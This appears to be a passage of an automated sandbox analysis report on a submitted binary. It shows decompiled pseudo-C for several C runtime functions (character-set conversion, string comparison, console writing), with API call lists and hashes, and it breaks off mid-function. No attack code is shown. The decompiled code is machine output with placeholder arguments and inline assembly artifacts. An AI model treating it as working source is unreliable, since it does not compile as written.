        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c83a6b6a472ec04d6c9d5fb753ffd229562f112202eda93caf714974bbbe2610
        • Instruction ID: 88b96bc2bf26666b3bf0ee9af6500240d9f2b4d31e6a717651da7f404f3bcf61
        • Opcode Fuzzy Hash: c83a6b6a472ec04d6c9d5fb753ffd229562f112202eda93caf714974bbbe2610
        • Instruction Fuzzy Hash: 36E092BA34021487C700CA15D480E43B7AAF7D8230B5182A0CA1D87346C930EDC385E2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00268853 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMON
        Download Yara Rule
        C-Code - Quality: 69%
        			E00268853(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x273018; // 0x16a19189
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0026914F(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E002629BB(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00266F6B(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00266564(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00266F6B(_t101);
									goto L36;
								}
								_t62 = E00266564(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00266F6B(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E002646B0(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E0026BFA0();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00266564(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E002646B0(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E0026BFA0();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























        0x00268858
        0x00268859
        0x0026885a
        0x00268861
        0x00268865
        0x00268866
        0x0026886c
        0x00268872
        0x00268878
        0x0026887b
        0x0026887b
        0x0026887e
        0x00268880
        0x00268880
        0x0026887e
        0x00268882
        0x00268887
        0x0026888e
        0x00268891
        0x00268891
        0x002688ad
        0x002688b3
        0x002688b8
        0x00268a4b
        0x00268a5e
        0x002688be
        0x002688be
        0x002688c1
        0x002688c6
        0x002688ca
        0x0026891e
        0x0026891e
        0x00268920
        0x00268922
        0x00268a40
        0x00268a40
        0x00268a42
        0x00268a43
        0x00000000
        0x00268a49
        0x00268933
        0x00268939
        0x0026893b
        0x00000000
        0x00000000
        0x00268941
        0x00268953
        0x00268958
        0x0026895c
        0x00000000
        0x00000000
        0x00268969
        0x002689a3
        0x002689a6
        0x002689a9
        0x002689ab
        0x002689ad
        0x002689af
        0x002689fb
        0x002689fb
        0x002689fd
        0x002689fd
        0x002689ff
        0x00268a39
        0x00268a3a
        0x00000000
        0x00268a3f
        0x00268a13
        0x00268a18
        0x00268a1a
        0x00000000
        0x00000000
        0x00268a1e
        0x00268a1f
        0x00268a20
        0x00268a23
        0x00268a5f
        0x00268a62
        0x00268a25
        0x00268a25
        0x00268a26
        0x00268a26
        0x00268a33
        0x00268a35
        0x00268a37
        0x00268a68
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00268a37
        0x002689b1
        0x002689b4
        0x002689b6
        0x002689b8
        0x002689ba
        0x002689bd
        0x002689c2
        0x002689dd
        0x002689df
        0x002689e9
        0x002689eb
        0x002689ec
        0x002689ee
        0x00000000
        0x00000000
        0x002689f0
        0x002689f6
        0x002689f6
        0x00000000
        0x002689f6
        0x002689c4
        0x002689c6
        0x002689ca
        0x002689cf
        0x002689d1
        0x002689d3
        0x00000000
        0x00000000
        0x002689d5
        0x00000000
        0x002689d5
        0x0026896b
        0x00268970
        0x00000000
        0x00000000
        0x00268976
        0x00268978
        0x00000000
        0x00000000
        0x0026898f
        0x00268994
        0x00268998
        0x00000000
        0x00000000
        0x00000000
        0x0026899e
        0x002688d1
        0x002688d3
        0x002688d5
        0x002688dd
        0x002688fc
        0x002688fe
        0x00268908
        0x0026890a
        0x0026890b
        0x0026890d
        0x00000000
        0x00000000
        0x00268913
        0x00268919
        0x00268919
        0x00000000
        0x00268919
        0x002688e1
        0x002688e5
        0x002688ea
        0x002688ee
        0x00000000
        0x00000000
        0x002688f4
        0x00000000
        0x002688f4

        APIs
        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,W\&,00000000,?,?,?,00268AA4,?,?,00000100), ref: 002688AD
        • __alloca_probe_16.LIBCMT ref: 002688E5
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00268AA4,?,?,00000100,?,?,?), ref: 00268933
        • __alloca_probe_16.LIBCMT ref: 002689CA
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00268A2D
        • __freea.LIBCMT ref: 00268A3A
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        • __freea.LIBCMT ref: 00268A43
        • __freea.LIBCMT ref: 00268A68
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
        • String ID: W\&
        • API String ID: 2597970681-1387361922
        • Opcode ID: 3b90bad7f2d91844969e3a08ce2f42e82e601955718ed36c877d301712c63050
        • Instruction ID: 3403a379ff7b55b9d50530792f4e1bbcc35033d2bb80ca051bec6f53c0fe2e3d
        • Opcode Fuzzy Hash: 3b90bad7f2d91844969e3a08ce2f42e82e601955718ed36c877d301712c63050
        • Instruction Fuzzy Hash: 1A51D072630216ABDF258EA4DC45EBB77A9EB44750F24472AFC05D6240EF74DCE0DA90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 0026928E Relevance: 13.8, APIs: 9, Instructions: 268COMMON
        Download Yara Rule
        C-Code - Quality: 83%
        			E0026928E(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				short* _v32;
				int _v36;
				char* _v40;
				int _v44;
				intOrPtr _v48;
				void* _v60;
				signed int _t63;
				int _t70;
				signed int _t72;
				short* _t73;
				signed int _t77;
				short* _t87;
				void* _t89;
				void* _t92;
				int _t99;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t112;
				char* _t114;
				char* _t115;
				void* _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr _t123;
				intOrPtr* _t125;
				short* _t126;
				int _t128;
				int _t129;
				short* _t130;
				intOrPtr* _t131;
				signed int _t132;
				short* _t133;

				_t63 =  *0x273018; // 0x16a19189
				_v8 = _t63 ^ _t132;
				_t128 = _a20;
				_v44 = _a4;
				_v48 = _a8;
				_t67 = _a24;
				_v40 = _a24;
				_t125 = _a16;
				_v36 = _t125;
				if(_t128 <= 0) {
					if(_t128 >= 0xffffffff) {
						goto L2;
					} else {
						goto L5;
					}
				} else {
					_t128 = E0026914F(_t125, _t128);
					_t67 = _v40;
					L2:
					_t99 = _a28;
					if(_t99 <= 0) {
						if(_t99 < 0xffffffff) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						_t99 = E0026914F(_t67, _t99);
						L7:
						_t70 = _a32;
						if(_t70 == 0) {
							_t70 =  *( *_v44 + 8);
							_a32 = _t70;
						}
						if(_t128 == 0 || _t99 == 0) {
							if(_t128 != _t99) {
								if(_t99 <= 1) {
									if(_t128 <= 1) {
										if(GetCPInfo(_t70,  &_v28) == 0) {
											goto L5;
										} else {
											if(_t128 <= 0) {
												if(_t99 <= 0) {
													goto L36;
												} else {
													_t89 = 2;
													if(_v28 >= _t89) {
														_t114 =  &_v22;
														if(_v22 != 0) {
															_t131 = _v40;
															while(1) {
																_t122 =  *((intOrPtr*)(_t114 + 1));
																if(_t122 == 0) {
																	goto L15;
																}
																_t101 =  *_t131;
																if(_t101 <  *_t114 || _t101 > _t122) {
																	_t114 = _t114 + _t89;
																	if( *_t114 != 0) {
																		continue;
																	} else {
																		goto L15;
																	}
																}
																goto L63;
															}
														}
													}
													goto L15;
												}
											} else {
												_t92 = 2;
												if(_v28 >= _t92) {
													_t115 =  &_v22;
													if(_v22 != 0) {
														while(1) {
															_t123 =  *((intOrPtr*)(_t115 + 1));
															if(_t123 == 0) {
																goto L17;
															}
															_t102 =  *_t125;
															if(_t102 <  *_t115 || _t102 > _t123) {
																_t115 = _t115 + _t92;
																if( *_t115 != 0) {
																	continue;
																} else {
																	goto L17;
																}
															}
															goto L63;
														}
													}
												}
												goto L17;
											}
										}
									} else {
										L17:
										_push(3);
										goto L13;
									}
								} else {
									L15:
								}
							} else {
								_push(2);
								L13:
							}
						} else {
							L36:
							_t126 = 0;
							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
							_v44 = _t72;
							if(_t72 == 0) {
								L5:
							} else {
								_t120 = _t72 + _t72;
								asm("sbb eax, eax");
								if((_t120 + 0x00000008 & _t72) == 0) {
									_t73 = 0;
									_v32 = 0;
									goto L45;
								} else {
									asm("sbb eax, eax");
									_t85 = _t72 & _t120 + 0x00000008;
									_t112 = _t120 + 8;
									if((_t72 & _t120 + 0x00000008) > 0x400) {
										asm("sbb eax, eax");
										_t87 = E002646B0(_t112, _t85 & _t112);
										_v32 = _t87;
										if(_t87 == 0) {
											goto L61;
										} else {
											 *_t87 = 0xdddd;
											goto L43;
										}
									} else {
										asm("sbb eax, eax");
										E0026BFA0();
										_t87 = _t133;
										_v32 = _t87;
										if(_t87 == 0) {
											L61:
											_t100 = _v32;
										} else {
											 *_t87 = 0xcccc;
											L43:
											_t73 =  &(_t87[4]);
											_v32 = _t73;
											L45:
											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E002646B0(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E0026BFA0();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = E00266333(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E00266F6B(_t130);
													}
												}
											}
										}
									}
								}
								E00266F6B(_t100);
							}
						}
					}
				}
				L63:
				return E002629BB(_v8 ^ _t132);
			}






































        0x00269296
        0x0026929d
        0x002692a5
        0x002692a8
        0x002692ae
        0x002692b1
        0x002692b4
        0x002692b8
        0x002692bb
        0x002692c0
        0x002692e7
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x002692c2
        0x002692ca
        0x002692cc
        0x002692d0
        0x002692d0
        0x002692d5
        0x002692f3
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x002692d7
        0x002692e0
        0x002692f5
        0x002692f5
        0x002692fa
        0x00269301
        0x00269304
        0x00269304
        0x00269309
        0x00269315
        0x00269322
        0x0026932f
        0x00269342
        0x00000000
        0x00269344
        0x00269346
        0x00269379
        0x00000000
        0x0026937b
        0x0026937d
        0x00269381
        0x00269387
        0x0026938a
        0x0026938c
        0x0026938f
        0x0026938f
        0x00269394
        0x00000000
        0x00000000
        0x00269396
        0x0026939a
        0x002693a4
        0x002693a9
        0x00000000
        0x002693ab
        0x00000000
        0x002693ab
        0x002693a9
        0x00000000
        0x0026939a
        0x0026938f
        0x0026938a
        0x00000000
        0x00269381
        0x00269348
        0x0026934a
        0x0026934e
        0x00269354
        0x00269357
        0x00269359
        0x00269359
        0x0026935e
        0x00000000
        0x00000000
        0x00269360
        0x00269364
        0x0026936e
        0x00269373
        0x00000000
        0x00269375
        0x00000000
        0x00269375
        0x00269373
        0x00000000
        0x00269364
        0x00269359
        0x00269357
        0x00000000
        0x0026934e
        0x00269346
        0x00269331
        0x00269331
        0x00269331
        0x00000000
        0x00269331
        0x00269324
        0x00269324
        0x00269326
        0x00269317
        0x00269317
        0x00269319
        0x00269319
        0x002693b0
        0x002693b0
        0x002693b0
        0x002693bd
        0x002693c3
        0x002693c8
        0x002692e9
        0x002693ce
        0x002693ce
        0x002693d6
        0x002693da
        0x00269435
        0x00269437
        0x00000000
        0x002693dc
        0x002693e1
        0x002693e3
        0x002693e5
        0x002693ed
        0x00269411
        0x00269416
        0x0026941b
        0x00269421
        0x00000000
        0x00269427
        0x00269427
        0x00000000
        0x00269427
        0x002693ef
        0x002693f1
        0x002693f5
        0x002693fa
        0x002693fc
        0x00269401
        0x00269516
        0x00269516
        0x00269407
        0x00269407
        0x0026942d
        0x0026942d
        0x00269430
        0x0026943a
        0x0026943c
        0x00000000
        0x00269442
        0x0026944a
        0x00269458
        0x00000000
        0x0026945e
        0x00269467
        0x0026946d
        0x00269472
        0x00000000
        0x00269478
        0x00269478
        0x0026947b
        0x00269480
        0x00269484
        0x002694d0
        0x00000000
        0x00269486
        0x0026948b
        0x0026948d
        0x0026948f
        0x00269497
        0x002694b4
        0x002694be
        0x002694c0
        0x002694c3
        0x00000000
        0x002694c5
        0x002694c5
        0x00000000
        0x002694c5
        0x00269499
        0x0026949b
        0x0026949f
        0x002694a4
        0x002694a8
        0x0026950a
        0x0026950a
        0x002694aa
        0x002694aa
        0x002694cb
        0x002694cb
        0x002694d2
        0x002694d4
        0x00000000
        0x002694ed
        0x002694ed
        0x00269506
        0x00269506
        0x002694d4
        0x002694a8
        0x00269497
        0x0026950e
        0x00269513
        0x00269472
        0x00269458
        0x0026943c
        0x00269401
        0x002693ed
        0x0026951a
        0x00269520
        0x002693c8
        0x00269309
        0x002692d5
        0x00269522
        0x00269535

        APIs
        • GetCPInfo.KERNEL32(0089F0A0,0089F0A0,?,7FFFFFFF,?,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?,0089F0A0), ref: 0026933A
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000009,0089F0A0,0089F0A0,00000000,00000000,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 002693BD
        • __alloca_probe_16.LIBCMT ref: 002693F5
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000001,0089F0A0,0089F0A0,00000000,00269567,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 00269450
        • __alloca_probe_16.LIBCMT ref: 0026949F
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000009,0089F0A0,0089F0A0,00000000,00000000,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 00269467
          • Part of subcall function 002646B0: HeapAlloc.KERNEL32(00000000,?,00000004,?,00268CDE,?,00000000,?,00267370,?,00000004,00000000,?,?,?,0026437B), ref: 002646E2
        • MultiByteToWideChar.KERNEL32(0089F0A0,00000001,0089F0A0,0089F0A0,00000000,0089F0A0,?,00269567,0089F0A0,0089F0A0,?,0089F0A0,?,?,?,?), ref: 002694E3
        • __freea.LIBCMT ref: 0026950E
        • __freea.LIBCMT ref: 0026951A
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
        • String ID:
        • API String ID: 3256262068-0
        • Opcode ID: 0ee0b04173fa58a3d404fba1ece44143371e964666c9e073b66f613eba416741
        • Instruction ID: 1fc09f7c748d35bfa61373416bbbcf00cbb86ad607a2f40e6ef4cf53f875c171
        • Opcode Fuzzy Hash: 0ee0b04173fa58a3d404fba1ece44143371e964666c9e073b66f613eba416741
        • Instruction Fuzzy Hash: 4A91D471E302469ADF218E75C885AEE7BBDAF49710F584159E805E7280DF34DCE1CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 002696AD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
        Download Yara Rule
        C-Code - Quality: 73%
        			E002696AD(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x273018; // 0x16a19189
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x273f60 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x273f60 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00266BA1(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x273f60 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x273f60 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x273f60 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00267F6A( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00267F6A();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E002629BB(_v8 ^ _t136);
			}


































        0x002696b5
        0x002696bc
        0x002696bf
        0x002696c7
        0x002696cb
        0x002696d7
        0x002696da
        0x002696dd
        0x002696e4
        0x002696ec
        0x002696ef
        0x002696f5
        0x002696fb
        0x00269700
        0x00269702
        0x00269705
        0x0026970a
        0x00269714
        0x0026971b
        0x0026971e
        0x00269725
        0x0026972c
        0x00269758
        0x0026977e
        0x00269780
        0x00000000
        0x0026975a
        0x0026975d
        0x00269824
        0x00269830
        0x0026983b
        0x00269840
        0x00269763
        0x0026976a
        0x0026976f
        0x00269775
        0x0026977b
        0x00000000
        0x0026977b
        0x00269775
        0x0026975d
        0x0026972e
        0x00269732
        0x00269735
        0x0026973b
        0x0026973d
        0x00269740
        0x00269744
        0x00269781
        0x00269784
        0x00269785
        0x0026978a
        0x00269790
        0x00269796
        0x002697a5
        0x002697ab
        0x002697b1
        0x002697b6
        0x002697d2
        0x00269845
        0x0026984b
        0x002697d4
        0x002697dc
        0x002697e5
        0x002697eb
        0x00000000
        0x002697ed
        0x002697ef
        0x002697f2
        0x0026980b
        0x00000000
        0x0026980d
        0x00269811
        0x00269813
        0x00269816
        0x00000000
        0x00269816
        0x00269811
        0x0026980b
        0x002697eb
        0x002697e5
        0x002697d2
        0x002697b6
        0x00269790
        0x00000000
        0x00269819
        0x00269819
        0x0026984d
        0x0026985f

        APIs
        • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00269E22,?,00000000,?,00000000,00000000), ref: 002696EF
        • __fassign.LIBCMT ref: 0026976A
        • __fassign.LIBCMT ref: 00269785
        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 002697AB
        • WriteFile.KERNEL32(?,?,00000000,00269E22,00000000,?,?,?,?,?,?,?,?,?,00269E22,?), ref: 002697CA
        • WriteFile.KERNEL32(?,?,00000001,00269E22,00000000,?,?,?,?,?,?,?,?,?,00269E22,?), ref: 00269803
        Memory Dump Source
        • Source File: 00000000.00000002.268673362.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
        • Associated: 00000000.00000002.268665443.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268687601.000000000026D000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268696251.0000000000273000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.268711075.0000000000275000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_260000_692BB93169319EBA2F556174D781A8636D610A67E6838.jbxd
        Similarity
        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
        • String ID:
        • API String ID: 1324828854-0
        • Opcode ID: 83a01840890a629c4e2a4222b114a2b19e8a239ae741a9c370d48621211d9045
        • Instruction ID: 9ab9997cf284bd8a723c4120c8d7c62a48dc0579cdf394286804d6d858ca98e3
        • Opcode Fuzzy Hash: 83a01840890a629c4e2a4222b114a2b19e8a239ae741a9c370d48621211d9045
        • Instruction Fuzzy Hash: 9151B371E10209DFCB10CFA8D885AEEBBF8EF0A710F14415AE955E7251DA70A9D1CBA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00266E4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMON
        Download Yara Rule
        C-Code - Quality: 81%
        			E00266E4E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x273018; // 0x16a19189
				_v8 = _t34 ^ _t70;
				E002647F8(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E002629BB(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
